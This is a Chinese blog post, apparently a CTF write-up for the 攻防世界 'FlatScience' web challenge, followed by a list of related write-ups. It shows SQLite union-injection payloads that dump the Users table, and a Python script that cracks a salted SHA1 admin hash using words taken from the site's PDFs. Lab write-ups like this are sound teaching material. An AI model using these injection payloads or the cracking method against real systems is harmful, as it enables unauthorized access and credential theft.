攻防世界 web FlatScience

最新推荐文章于 2024-07-27 22:34:05 发布
最新推荐文章于 2024-07-27 22:34:05 发布
阅读量391 收藏
点赞数
分类专栏: 攻防世界 write up 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43478096/article/details/104663392
版权

http://39.96.86.88/2020/04/03/

打开网页后每个转跳都点一下发现都是pdf文件除了here
在这里插入图片描述
进入了根目录1,然后点here或者these会进入不同的根目录。
这也太难看出其中的奥秘了,用dirsearch跑一下。
在这里插入图片描述
经过测试后:发现login.php与admin.php是解题的关键
admin.php的源代码提示了不要绕过,虽然大多数题目都会这样说。
在这里插入图片描述
在login.php的源代码里找到了提示
在这里插入图片描述
加上 ?debuf 出现源码
通过网页输入而且连接sqlite数据库,这无疑是SQLite注入了。
SQLite数据库自带sqlite_master表。
在这里插入图片描述
查询 usr=‘ union select name,sql from sqlite_master&pw=
在这里插入图片描述通过set-cookie发现Users里面有这几个表

id int primary key
name varchar
password varchar
hint varchar

于是利用联合查询一个一个看:
UNION :合并两个或者两个以上的SQL语句(默认地,UNION 操作符选取不同的值)
UNION ALL:合并操作符相同的几个SQL语句

usr=%27 UNION SELECT id, name from Users--+&pw=chybeta
//name=+admin
usr=%27 UNION SELECT id, password from Users--+&pw=chybeta
//name=+3fab54a50e770d830c0416df817567662a9dc85c
usr=%27 UNION SELECT id, hint from Users--+&pw=chybeta
// name=+my+fav+word+in+my+fav+paper%3F%21

根据hint的name=+my+fav+word+in+my+fav+paper%3F%21提示可能passwrod在pdf文章的hash码中。

结合前面源代码里的password加密,先用wget将网站的全部pdf文件down下来。

wget ip -r -np -nd -A .pdf

然后用脚本拼接上"Salz"后hash加密与前面注入得出的password比较,这样就可以得出管理员得密码了
在这里插入图片描述我的kali炸了,以后再实机演示。

下面贴出大佬的脚本:

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
 
if __name__ == "__main__":
	find_password()

这道题碰巧可以用另一种方法,账户密码刚好可以md解密出来
在这里插入图片描述去掉后面的Salz!,管理员登陆得到flag
在这里插入图片描述

没写完,明天再来。
https://blog.csdn.net/zz_caleb/article/details/89323133

tothemoon_2019
关注
专栏目录
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 313
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界web进阶区FlatScience
gongjingege的博客
08-05 312
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
攻防世界-FlatScience
qq_44418229的博客
07-24 722
sqlite注入和sql注入的区别 sha1()函数的相关内容 setcookie()函数的相关内容
攻防世界新手模式xxxorrr
最新发布
2302_79735426的博客
07-27 170
(即主函数或程序的入口点返回后),可能会有一些清理工作需要进行,如释放资源、保存状态等。这些工作可能通过回调函数的形式进行,尽管它们。得到 flag{c0n5truct0r5_functi0n_in_41f}所以初步判断 s1与s进行异或 与 v2相等 s即是我们得到的flag。打开s1后 Ctrl+x 发现sub_84A也使用了s1。1.调用了一个函数 sub_A90()s1 与 s2 进行比较,如果相等则正确。打开该函数,发现还有一个异或。3. s1与 s 异或。
攻防世界FlatScience
wangzhemvp的博客
04-06 1150
想到在查看 robots.txt 的时候有个 admin.php,选 admin 来破解,根据 hint 猜测 fav word 藏在前面看到的 pdf 里面,需要写个脚本,把里面的词都给提取出来,拼接上”Salz!想办法把 pdf 文件都给爬下来。输入 http://61.147.171.105:61912/login.php/name 等同于 if 语句中的 id,sql 等同于 name。在login.php 中发现。
攻防世界-web-FlatScience
wuh2333的博客
10-25 441
攻防世界webFlatScience
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
[CTF题目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1740
[CTF题目总结-web篇]攻防世界flatscience
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界 web高手进阶区 4分题(fakebook、ics-04、ics-05、FlatScience
闵行小鱼塘
07-16 593
继续ctf的旅程,攻防世界web高手进阶区的4分题:fakebook、ics-04、ics-05、FlatScience
攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 692
攻防世界WEB】四星12分
攻防世界web进阶区FlatScience详解
hxhxhxhxx的博客
08-06 2871
攻防世界web进阶区FlatScience题目解法 题目 解法 我们一个一个点进去发现也就是一些论文之类的 我们御剑发现了一些东西 robots。txt 我们登录试试 在login页面有报错,我们猜测是sql注入 他的源码中写到,登录是你不可能绕过的 这里源码中出现了?debug,可能是一个调试页面,我们访问看看 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['u
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 873
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1357
题目 ---- FlatScience 一、writeup 二、知识点
攻防世界-Web高手进阶区-FlatScience
feng的博客
09-13 680
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界--game
weixin_30876945的博客
08-17 1234
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074 1.准备 打开测试用例 首先分析程序 得到是win32程序 2.第一种方法 2.1 分析代码 使用IDA打开,找到main函数,F5得到C代码 得知主要是...
攻防世界 FlatScience
CyhDl666的博客
02-25 306
各种here these 一个个点 url不断变化 直接dirsearch扫描一些 - 最近做题经常做到robots.txt!!!1 访问了一下 也是给了admin.php 和 login.php 访问login界面是个登录窗 访问admin界面也是登录窗 不过账号已经给你了 看到登录界面难面尝试一下sql注入 这里我想到以前做个的一个sql注入加md5加密的题目 但是这个得需要知道查询的代码 没学过sqlite3 无奈wp CppSQLite3Queryquery = db.execQue.
攻防世界FlatScience
qq_46230755的博客
01-19 191
第一步扫一下目录 进入admin.php发现存在一个输入框 暂时没什么用 进入login.php 有个输入框,注入有回显,还报错 发现是SQLite3数据库 查看页面源码提示去debug 得到源码 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['usr']; $pass = $_POST['pw']; $db = new SQLite3
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值